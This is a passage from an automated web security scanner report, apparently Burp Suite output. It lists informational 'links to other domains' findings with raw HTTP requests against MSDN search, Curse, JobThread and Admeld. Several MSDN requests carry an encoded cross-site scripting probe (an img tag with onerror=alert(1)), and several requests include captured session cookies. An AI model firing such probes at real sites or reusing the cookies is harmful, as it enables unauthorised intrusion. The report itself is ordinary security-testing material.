http://msstonojssocial.112.2o7.net/b/ss/msstonojssocial/1/H.20.2--NS/0
http://www.omniture.com/
https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=social.msdn.microsoft.com&wreply=https%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3d84e17%253Cimg%252520src%25253da%252520onerror%25253dalert(1)%253E8704c19d382%3d1%26Refinement%3d123%26ac%3d8%26stoAI%3d10&wp=MBI_FED_SSL&wlcxt=Msdn%24Msdn%24Msdn

Request

Response

18.118. http://social.msdn.microsoft.com/Search/en-US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.msdn.microsoft.com
Path:	/Search/en-US

Issue detail

The page was loaded from a URL containing a query string:

http://social.msdn.microsoft.com/Search/en-US?query=deba5%3Cimg%2520src%253da%20%2520onerror%253dalert(1)%20%3E680b3dd871d&beta=0&ac=8

The response contains the following links to other domains:

http://ads1.msn.com/library/dap.js
http://code.jquery.com/jquery-1.6.1.min.js
http://i1.social.s-msft.com/Search/GlobalResources/Images/Msdn/networklogo_Msdn.png
http://i1.social.s-msft.com/Search/GlobalResources/Scripts/omni_rsid_social_min.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/GlobalResources/images/Msdn/favicon.ico
http://i1.social.s-msft.com/Search/GlobalResources/scripts/common.min.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/Styles/global.css?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/scriptloader.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/contentservice/e99f2bf9-5c6e-4ac4-80de-9f2400ced346/Msdn.css
http://msstonojssocial.112.2o7.net/b/ss/msstonojssocial/1/H.20.2--NS/0
http://www.omniture.com/
https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=social.msdn.microsoft.com&wreply=https%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3ddeba5%253Cimg%252520src%25253da%2520%252520onerror%25253dalert(1)%2520%253E680b3dd871d%26beta%3d0%26ac%3d8%26stoAI%3d10&wp=MBI_FED_SSL&wlcxt=Msdn%24Msdn%24Msdn

Request

GET /Search/en-US?query=deba5%3Cimg%2520src%253da%20%2520onerror%253dalert(1)%20%3E680b3dd871d&beta=0&ac=8 HTTP/1.1
Host: social.msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://social.msdn.microsoft.com/Search/en-US?query=xss&beta=0&ac=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; WT_NVR=0=/:1=en-us:2=en-us/magazine; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; .ASPXANONYMOUS=XXH0iVVkzQEkAAAAM2RhZjNlOGMtY2ZmOC00OGZkLWFkZmQtOWM1NGYzMjUyMGVknKZduOjFK586n4O0QyB3i3RZ2b01; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_vnum=1313879445324%26vn%3D1; mcI=Thu, 28 Jul 2011 23:06:08 GMT; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311338483550:ss=1311338373379; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779700021Gx0002g1Gx00&GO=12; msdn=L=1033; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=3c57a004-872d-43fc-b38f-edae296242c4&Microsoft.CreationDate=07/23/2011 04:56:35&Microsoft.LastVisitDate=07/23/2011 04:56:35&Microsoft.NumberOfVisits=1&SessionCookie.Id=AFCC0464AA1817DA9699AB011936CBEB; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/23/2011 04:56:35&Microsoft.VisitStartDate=07/23/2011 04:56:35&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=115&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=09b8386539504f9aac2463a9ce480499

Response

18.119. http://social.msdn.microsoft.com/Search/en-US/en-USebb6e previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.msdn.microsoft.com
Path:	/Search/en-US/en-USebb6e

Issue detail

The page was loaded from a URL containing a query string:

http://social.msdn.microsoft.com/Search/en-US/en-USebb6e?query=xss&beta=0&ac=8

The response contains the following links to other domains:

http://ads1.msn.com/library/dap.js
http://blog.stackoverflow.com/2008/06/safe-html-and-xss/
http://blogs.msdn.com/b/dross/archive/2008/03/10/xss-focused-attack-surface-reduction.aspx
http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-iv-the-xss-filter.aspx
http://blogs.msdn.com/b/ieinternals/archive/2011/05/19/socially-engineered-xss-attacks-and-pasting-javascript-in-the-address-bar-in-ie9.aspx
http://code.jquery.com/jquery-1.6.1.min.js
http://forums.asp.net/p/1684170/4432913.aspx/1?XSS+attack+problem
http://forums.asp.net/p/1696226/4489480.aspx/1?XSS
http://forums.asp.net/t/1285731.aspx
http://i1.social.s-msft.com/GlobalResources/images/trans.gif
http://i1.social.s-msft.com/Search/GlobalResources/Images/Msdn/networklogo_Msdn.png
http://i1.social.s-msft.com/Search/GlobalResources/Scripts/omni_rsid_social_min.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/GlobalResources/images/Msdn/favicon.ico
http://i1.social.s-msft.com/Search/GlobalResources/scripts/common.min.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/Styles/global.css?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/scriptloader.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/contentservice/e99f2bf9-5c6e-4ac4-80de-9f2400ced346/Msdn.css
http://img4.catalog.video.msn.com/image.aspx?uuid=8d62ffd0-6576-4140-9169-3a0f337d0c33&w=136&h=102
http://msstonojssocial.112.2o7.net/b/ss/msstonojssocial/1/H.20.2--NS/0
http://stackoverflow.com/questions/2051632/ie8-xss-filter-what-does-it-really-do
http://stackoverflow.com/questions/tagged/xss
http://weblogs.asp.net/rrobbins/archive/2007/10/19/xslt-for-a-dataset-designer-xss-file.aspx
http://www.codeproject.com/KB/aspnet/PoweryourselfagainstXSS.aspx
http://www.omniture.com/
http://xss.codeplex.com/
http://xss.codeplex.com/license
http://xss.codeplex.com/releases
http://xss.codeplex.com/team/view
http://xssattack.codeplex.com/
http://xssattack.codeplex.com/license
http://xssattack.codeplex.com/team/view
https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=social.msdn.microsoft.com&wreply=https%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%2fen-USebb6e%3fquery%3dxss%26beta%3d0%26ac%3d8%26stoAI%3d10&wp=MBI_FED_SSL&wlcxt=Msdn%24Msdn%24Msdn

Request

GET /Search/en-US/en-USebb6e?query=xss&beta=0&ac=8 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://social.msdn.microsoft.com/search/en-US/en-USebb6e
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: social.msdn.microsoft.com
Proxy-Connection: Keep-Alive
Cookie: MC0=1311396851498; A=I&I=AxUFAAAAAAB3CAAAgcVmZd5G6L3BAISOia0DUg!!; MSID=Microsoft.CreationDate=07/07/2011 15:17:00&Microsoft.LastVisitDate=07/23/2011 04:54:06&Microsoft.VisitStartDate=07/23/2011 04:54:06&Microsoft.CookieId=5f269ddf-903a-4297-aeeb-cca051ae84b8&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=7&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0052-6728-5832-1105; MC1=GUID=9f4507fc155a574cb422f82242928527&HASH=fc07&LV=20117&V=3; omniID=1310166844969_ad13_25fb_5a74_7dddf20c48a3; WT_FPC=id=173.193.214.243-3932679216.30162104:lv=1311283591719:ss=1311283591712; WT_NVR_RU=0=technet:1=:2=; msdn=L=1033; MUID=3320E7738B0764152F29E55B8F07641E; s_cc=true; s_sq=%5B%5BB%5D%5D; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=0a5f0a68-2007-4a70-bf6f-1327a038b2c3&Microsoft.CreationDate=07/23/2011 04:54:06&Microsoft.LastVisitDate=07/23/2011 04:54:06&Microsoft.NumberOfVisits=1&SessionCookie.Id=7B453F107B39934ED06646F81EF53849; MS0=d4013204c5c94dfcab27f527769f3ab8

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Tue, 23-Aug-2011 04:54:19 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB47
Date: Sat, 23 Jul 2011 04:54:18 GMT
ntCoent-Length: 63672
Content-Length: 63672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1">

<link rel="shortcut icon" href="http://i1.social.s-msft.com/Search/GlobalResources/images/Msdn/favicon.ico" type="image/x-icon" />
<link href="http://i1.social.s-msft.com/contentservice/e99f2bf9-5c6e-4ac4-80de-9f2400ced346/Msdn.css" rel="Stylesheet" type="text/css" /><meta name="CommunityInfo" content=" B=Msdn;A=Social;L=en-US;" />
<script src="http://code.jquery.com/jquery-1.6.1.min.js" type="text/javascript" language="javascript"></script>

<link rel="STYLESHEET" type="text/css" href="http://i1.social.s-msft.com/Search/Styles/global.css?cver=1864.870%0d%0a" />
<title>
...[SNIP]...
<div class="PassportScarab">
<a id="idPPScarab" href="https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=social.msdn.microsoft.com&wreply=https%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%2fen-USebb6e%3fquery%3dxss%26beta%3d0%26ac%3d8%26stoAI%3d10&wp=MBI_FED_SSL&wlcxt=Msdn%24Msdn%24Msdn">Sign in</a>
...[SNIP]...
<a id="NetworkLink" href="http://Msdn.microsoft.com/en-US">
<img id="NetworkTaglineLogo" src="http://i1.social.s-msft.com/Search/GlobalResources/Images/Msdn/networklogo_Msdn.png" />
</a>
...[SNIP]...
<a href="/search/en-US/feed?query=xss&format=RSS"><img src="http://i1.social.s-msft.com/GlobalResources/images/trans.gif" class="rssfeed" alt="Results in RSS" title="Results in RSS"></a>
...[SNIP]...
<td class="result">
<a href="http://blogs.msdn.com/b/ieinternals/archive/2011/05/19/socially-engineered-xss-attacks-and-pasting-javascript-in-the-address-bar-in-ie9.aspx" onclick="trackClick(this, '109', 'http\x3a\x2f\x2fblogs.msdn.com\x2fb\x2fieinternals\x2farchive\x2f2011\x2f05\x2f19\x2fsocially-engineered-xss-attacks-and-pasting-javascript-in-the-address-bar-in-ie9.aspx', '5');">Socially-Engineered <b>
...[SNIP]...
<td class="result">
<a href="http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-iv-the-xss-filter.aspx" onclick="trackClick(this, '109', 'http\x3a\x2f\x2fblogs.msdn.com\x2fb\x2fie\x2farchive\x2f2008\x2f07\x2f02\x2fie8-security-part-iv-the-xss-filter.aspx', '6');">IE8 Security Part IV: The <b>
...[SNIP]...
<td class="result">
<a href="http://forums.asp.net/p/1696226/4489480.aspx/1?XSS" onclick="trackClick(this, '112', 'http\x3a\x2f\x2fforums.asp.net\x2fp\x2f1696226\x2f4489480.aspx\x2f1\x3fXSS', '7');"><b>
...[SNIP]...
<td class="result">
<a href="http://stackoverflow.com/questions/tagged/xss" onclick="trackClick(this, '500', 'http\x3a\x2f\x2fstackoverflow.com\x2fquestions\x2ftagged\x2fxss', '9');">Newest '<b>
...[SNIP]...
<td class="result">
<a href="http://xss.codeplex.com/" onclick="trackClick(this, '456', 'http\x3a\x2f\x2fxss.codeplex.com\x2f', '10');">x5s - test encodings and character transformations to find <b>
...[SNIP]...
</span>
<a href="http://xss.codeplex.com/team/view" class="ResultMetaDataLink">3</a>
...[SNIP]...
</span>
<a href="http://xss.codeplex.com/license" class="ResultMetaDataLink">Custom</a>
...[SNIP]...
<div class="StatusInfo">
<a href="http://xss.codeplex.com/releases">x5s v1.0.1 beta</a>
...[SNIP]...
<td class="result">
<a href="http://xssattack.codeplex.com/" onclick="trackClick(this, '456', 'http\x3a\x2f\x2fxssattack.codeplex.com\x2f', '11');"><b>
...[SNIP]...
</span>
<a href="http://xssattack.codeplex.com/team/view" class="ResultMetaDataLink">2</a>
...[SNIP]...
</span>
<a href="http://xssattack.codeplex.com/license" class="ResultMetaDataLink">Ms-PL</a>
...[SNIP]...
<div class="ResultStatusVideo">
<img src="http://img4.catalog.video.msn.com/image.aspx?uuid=8d62ffd0-6576-4140-9169-3a0f337d0c33&w=136&h=102" />
</div>
...[SNIP]...
<td class="result">
<a href="http://blogs.msdn.com/b/dross/archive/2008/03/10/xss-focused-attack-surface-reduction.aspx" onclick="trackClick(this, '109', 'http\x3a\x2f\x2fblogs.msdn.com\x2fb\x2fdross\x2farchive\x2f2008\x2f03\x2f10\x2fxss-focused-attack-surface-reduction.aspx', '13');"><b>
...[SNIP]...
<td class="result">
<a href="http://www.codeproject.com/KB/aspnet/PoweryourselfagainstXSS.aspx" onclick="trackClick(this, '501', 'http\x3a\x2f\x2fwww.codeproject.com\x2fKB\x2faspnet\x2fPoweryourselfagainstXSS.aspx', '14');">Power yourself against <b>
...[SNIP]...
<td class="result">
<a href="http://stackoverflow.com/questions/2051632/ie8-xss-filter-what-does-it-really-do" onclick="trackClick(this, '500', 'http\x3a\x2f\x2fstackoverflow.com\x2fquestions\x2f2051632\x2fie8-xss-filter-what-does-it-really-do', '15');">internet explorer 8 - IE8 <b>
...[SNIP]...
<td class="result">
<a href="http://forums.asp.net/p/1684170/4432913.aspx/1?XSS+attack+problem" onclick="trackClick(this, '112', 'http\x3a\x2f\x2fforums.asp.net\x2fp\x2f1684170\x2f4432913.aspx\x2f1\x3fXSS\x2battack\x2bproblem', '17');"><b>
...[SNIP]...
<td class="result">
<a href="http://weblogs.asp.net/rrobbins/archive/2007/10/19/xslt-for-a-dataset-designer-xss-file.aspx" onclick="trackClick(this, '109', 'http\x3a\x2f\x2fweblogs.asp.net\x2frrobbins\x2farchive\x2f2007\x2f10\x2f19\x2fxslt-for-a-dataset-designer-xss-file.aspx', '18');">XSLT For A DataSet Designer <b>
...[SNIP]...
<td class="result">
<a href="http://blog.stackoverflow.com/2008/06/safe-html-and-xss/" onclick="trackClick(this, '500', 'http\x3a\x2f\x2fblog.stackoverflow.com\x2f2008\x2f06\x2fsafe-html-and-xss\x2f', '19');">Safe HTML and <b>
...[SNIP]...
<td class="result">
<a href="http://forums.asp.net/t/1285731.aspx" onclick="trackClick(this, '112', 'http\x3a\x2f\x2fforums.asp.net\x2ft\x2f1285731.aspx', '20');"><b>
...[SNIP]...
<a href="/search/en-US/feed?query=xss&format=RSS"><img src="http://i1.social.s-msft.com/GlobalResources/images/trans.gif" class="rssfeed" alt="Results in RSS" title="Results in RSS"></a>
...[SNIP]...
<div align="center" class="AdWidthFix" id="SearchAd" name="SearchAd" style="margin:auto;"><script language="javascript" src="http://Ads1.msn.com/library/dap.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://i1.social.s-msft.com/Search/scriptloader.js?cver=1864.870%0d%0a"></script>

<script src="http://i1.social.s-msft.com/Search/GlobalResources/scripts/common.min.js?cver=1864.870%0d%0a" type="text/javascript" language="javascript"></script>

<script src="http://i1.social.s-msft.com/Search/GlobalResources/Scripts/omni_rsid_social_min.js?cver=1864.870%0d%0a" type="text/javascript" language="javascript"></script>
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://msstonojssocial.112.2O7.net/b/ss/msstonojssocial/1/H.20.2--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...

18.120. http://social.msdn.microsoft.com/search/en-US previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.msdn.microsoft.com
Path:	/search/en-US

Issue detail

The page was loaded from a URL containing a query string:

http://social.msdn.microsoft.com/search/en-US?query=84e17%3cimg%2520src%253da%2520onerror%253dalert%281%29%3e8704c19d382%3d1

The response contains the following links to other domains:

http://ads1.msn.com/library/dap.js
http://code.jquery.com/jquery-1.6.1.min.js
http://i1.social.s-msft.com/GlobalResources/images/trans.gif
http://i1.social.s-msft.com/Search/GlobalResources/Images/Msdn/networklogo_Msdn.png
http://i1.social.s-msft.com/Search/GlobalResources/Scripts/omni_rsid_social_min.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/GlobalResources/images/Msdn/favicon.ico
http://i1.social.s-msft.com/Search/GlobalResources/scripts/common.min.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/Styles/global.css?cver=1864.870%0d%0a
http://i1.social.s-msft.com/Search/scriptloader.js?cver=1864.870%0d%0a
http://i1.social.s-msft.com/contentservice/e99f2bf9-5c6e-4ac4-80de-9f2400ced346/Msdn.css
http://msstonojssocial.112.2o7.net/b/ss/msstonojssocial/1/H.20.2--NS/0
http://rawr.codeplex.com/
http://www.asp.net/ajax
http://www.asp.net/get-started
http://www.asp.net/mvc
http://www.omniture.com/
http://www.silverlight.net/getstarted/
https://login.live.com/login.srf?wa=wsignin1.0&wtrealm=social.msdn.microsoft.com&wreply=https%3a%2f%2fsocial.msdn.microsoft.com%2fsearch%2fen-US%3fquery%3d84e17%253Cimg%252520src%25253da%252520onerror%25253dalert(1)%253E8704c19d382%3d1%26stoAI%3d10&wp=MBI_FED_SSL&wlcxt=Msdn%24Msdn%24Msdn

Request

GET /search/en-US?query=84e17%3cimg%2520src%253da%2520onerror%253dalert%281%29%3e8704c19d382%3d1 HTTP/1.1
Host: social.msdn.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://social.msdn.microsoft.com/Search/en-US?query=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1&Refinement=123&ac=8
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311385526307:ss=1311385526307; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/23/2011 04:45:57&Microsoft.VisitStartDate=07/23/2011 04:45:39&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=34&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!&GO=244; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; mcI=Thu, 28 Jul 2011 23:10:45 GMT; s_cc=true; s_sq=msstomsdn%2Cmsstomsdnsearch%3D%2526pid%253Dsocial.msdn%25253A/search/en-us%2526pidt%253D1%2526oid%253Dhttp%25253A//social.msdn.microsoft.com/search/en-US%25253Fquery%25253D84e17%2525253cimg%2525252520src%252525253da%2525252520onerror%252525253dalert%252525%2526ot%253DA; WT_NVR=0=/:1=en-us:2=en-us/vstudio; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=bf47075d-3b34-4779-ae6c-f0e3de5d879a&Microsoft.CreationDate=07/23/2011 04:45:39&Microsoft.LastVisitDate=07/23/2011 04:45:57&Microsoft.NumberOfVisits=2&SessionCookie.Id=C564621410F0B8D8787DE13565284D18; MS0=d41684a2852d4d37960ea64662e3fffb

Response

18.121. http://static.curse.com/themes/common/v6/scripts/core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://static.curse.com
Path:	/themes/common/v6/scripts/core.js

Issue detail

The page was loaded from a URL containing a query string:

http://static.curse.com/themes/common/v6/scripts/core.js?LastChanged=634456582020000000

The response contains the following link to another domain:

http://static.curse-gaming.com/images/busy_'+color+'.gif

Request

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60480000
Content-Type: application/x-javascript
Last-Modified: Tue, 17 May 2011 16:36:49 GMT
Accept-Ranges: bytes
ETag: "80e6539eb014cc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:48:22 GMT
Content-Length: 324214

/* D:\Projects\Curse\trunk\Curse.com\source\Curse.Build\..\Curse.Web\Themes\Common\v6\scripts\core\100-jquery.js */

(function(){var
window=this,undefined,_jQuery=window.jQuery,_$=window.$,jQuery=wind
...[SNIP]...
<span class="busy"><img src="http://static.curse-gaming.com/images/busy_'+color+'.gif" alt="Busy..." style="width: 16px; height:16px;" /> Busy...</span>
...[SNIP]...

18.122. http://syndication.jobthread.com/jt/syndication/page.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://syndication.jobthread.com
Path:	/jt/syndication/page.php

Issue detail

The page was loaded from a URL containing a query string:

http://syndication.jobthread.com/jt/syndication/page.php?url_directory=&type=jobroll&s_domain_name=jobs.treehugger.com&num_jobs=6

The response contains the following links to other domains:

http://jobs.treehugger.com/
http://jobs.treehugger.com/job/commodities-manager-waltham-ma-blu-homes-2b20caae0e/?d=1&source=jobroll
http://jobs.treehugger.com/job/crm-administrator-salesforce-com-guru-boulder-co-renewable-choice-energy-b6d4e4837f/?d=1&source=jobroll
http://jobs.treehugger.com/job/development-internship-boston-ma-corporate-accountability-international-0737163a30/?d=1&source=jobroll
http://jobs.treehugger.com/job/front-end-web-developer-san-francisco-ca-clean-power-finance-255d5a2aa0/?d=1&source=jobroll
http://jobs.treehugger.com/job/green-mechanical-engineer-energy-efficient-lighting-danvers-ma-boston-area-osram-sylvania-ee5494d462/?d=1&source=jobroll
http://jobs.treehugger.com/job/inside-sales-representative-edmonton-ab-canada-bilingual-recruiters-inc-3d5380cbdb/?d=1&source=jobroll
http://jobs.treehugger.com/post

Request

GET /jt/syndication/page.php?url_directory=&type=jobroll&s_domain_name=jobs.treehugger.com&num_jobs=6 HTTP/1.1
Host: syndication.jobthread.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/files/2011/07/sea-shepherd-ship-detained-shetland-islands-million-dollar-bond-needed.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:19:04 GMT
Server: Apache/2
Vary: Host
Content-Length: 4885
Connection: close
Content-Type: application/x-javascript

document.write(' <div style="display:none;">-</div>');

document.write(' <style type="text/css"> div.jobthread-jobroll-box, div.jobthread-jobroll-box table { color: ' + jobthread_jobroll_text_color
...[SNIP]...
<div style="padding-top:2px;padding-bottom:2px;padding-left:10px;padding-right:10px;"><a href="http://jobs.treehugger.com/job/green-mechanical-engineer-energy-efficient-lighting-danvers-ma-boston-area-osram-sylvania-ee5494d462/?d=1&source=jobroll" class="job-link">Green Mechanical Engineer: Energy...</a>
...[SNIP]...
<div style="padding-top:2px;padding-bottom:2px;padding-left:10px;padding-right:10px;"><a href="http://jobs.treehugger.com/job/crm-administrator-salesforce-com-guru-boulder-co-renewable-choice-energy-b6d4e4837f/?d=1&source=jobroll" class="job-link">CRM Administrator/Salesforce.com Guru</a>
...[SNIP]...
<div style="padding-top:2px;padding-bottom:2px;padding-left:10px;padding-right:10px;"><a href="http://jobs.treehugger.com/job/commodities-manager-waltham-ma-blu-homes-2b20caae0e/?d=1&source=jobroll" class="job-link">Commodities Manager</a>
...[SNIP]...
<div style="padding-top:2px;padding-bottom:2px;padding-left:10px;padding-right:10px;"><a href="http://jobs.treehugger.com/job/front-end-web-developer-san-francisco-ca-clean-power-finance-255d5a2aa0/?d=1&source=jobroll" class="job-link">Front End Web Developer</a>
...[SNIP]...
<div style="padding-top:2px;padding-bottom:2px;padding-left:10px;padding-right:10px;"><a href="http://jobs.treehugger.com/job/inside-sales-representative-edmonton-ab-canada-bilingual-recruiters-inc-3d5380cbdb/?d=1&source=jobroll" class="job-link">Inside Sales Representative</a>
...[SNIP]...
<div style="padding-top:2px;padding-bottom:2px;padding-left:10px;padding-right:10px;"><a href="http://jobs.treehugger.com/job/development-internship-boston-ma-corporate-accountability-international-0737163a30/?d=1&source=jobroll" class="job-link">Development Internship</a>
...[SNIP]...
<div style="padding-left:10px;padding-right:10px;"><a href="http://jobs.treehugger.com/" class="standard-link">See more jobs</a><a href="http://jobs.treehugger.com/post" class="standard-link">Post your job here</a>
...[SNIP]...

18.123. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220

Issue detail

The page was loaded from a URL containing a query string:

http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=

The response contains the following links to other domains:

http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match
http://pixel.invitemedia.com/data_sync?partner_id=134&exchange_id=6
http://r.turn.com/server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match
http://va.px.invitemedia.com/admeld_imp?returnType=image&key=AdImp&cost=1.59&creativeID=130123&message=eJwVjTkOgDAMBL.CXBMp8R2ew5EqoqNC_B272hnJ3n2BCLaFRA3XBQhDDFXdwloIMHe5lK0MG164eS374LOcQoc1cu8HQr7msQlWS8sejZTIjkkcdD9zBmqOuJN8P445GnY-&managed=false
http://w55c.net/ct/cms-2-frame.html?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=260&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match

Request

GET /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
